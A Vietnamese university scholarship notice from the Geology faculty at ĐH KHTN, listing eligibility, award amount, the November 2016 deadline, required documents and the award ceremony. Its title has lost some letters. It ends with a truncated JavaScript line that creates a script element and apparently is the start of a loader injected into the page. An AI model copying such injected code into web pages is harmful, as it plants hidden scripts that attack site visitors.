HC BNG THP SÁNG ƯỚC MƠ

*******

Học bổng thắp sáng ước mơ là một nguồn học bổng thường xuyên và định kì của khoa Địa chất được trao tặng trong các dịp lễ kỷ niệm, chung kết các cuộc thi học thuật hằng năm. Học bổng dành cho đối tượng sinh viên có thành tích học tập tốt hoặc tích cực tham gia các hoạt động Đoàn – Hội, hoạt động xã hội do trường/khoa/lớp tổ chức. Ưu tiên các bạn có hoàn cảnh khó khăn, biết vươn lên trong học tập.

=======================
***Thông tin học bổng:
1. Đối tượng : Sinh viên khoa Địa chất trường ĐH KHTN
2. Trị giá : 1.500.000 đ / suất
3. Thời gian : hạn chót nộp hồ sơ 12 giờ 00, 15/11/2016 (Thứ ba).
4. Hồ sơ học bổng bao gồm:
+ Đơn xin học bổng (theo mẫu đính kèm).
+ Bảng điểm tích lũy năm học 2015 – 2016 (đối với sinh viên năm 2,3,4).
+ Bảng điểm rèn luyện năm học 2015 – 2016 (đối với sinh viên năm 2,3,4).
+ Bảng photo Giấy báo nhập học đối với sinh viên năm nhất (không cần công chứng).
+ Giấy xác nhận gia đình khó khăn, gia đình chính sách hoặc sổ hộ nghèo (nếu có)
5. Hình thức nộp hồ sơ:
Nộp đầy đủ hồ sơ giấy theo đúng tiêu chuẩn và yêu cầu mục 4 của Thông báo này. Sau đó nộp trực tiếp lại cho Bí thư chi Đoàn.
6. Kết quả học bổng:
Sẽ được thông báo trên fanpage Đoàn – Hội Địa chất KHTN (https://www.facebook.com/dk.lch.diachatkhtn) trước ngày 19/11/2016. Lễ trao học bổng cho sinh viên được nhận được trao trong chương trình “Lễ kỷ niệm ngày Nhà giáo Việt Nam 20/11 và Hội ngộ cựu sinh viên – Khoa Địa chất” vào ngày 19/11/2016 tại Giảng đường 1 trường ĐH KHTN cơ sở Nguyễn Văn Cừ.

Mẫu Đơn xin học bổng  Tại đây

Thông báo học bổng Tại đây

var d=document;var s=d.createElement(‘script’);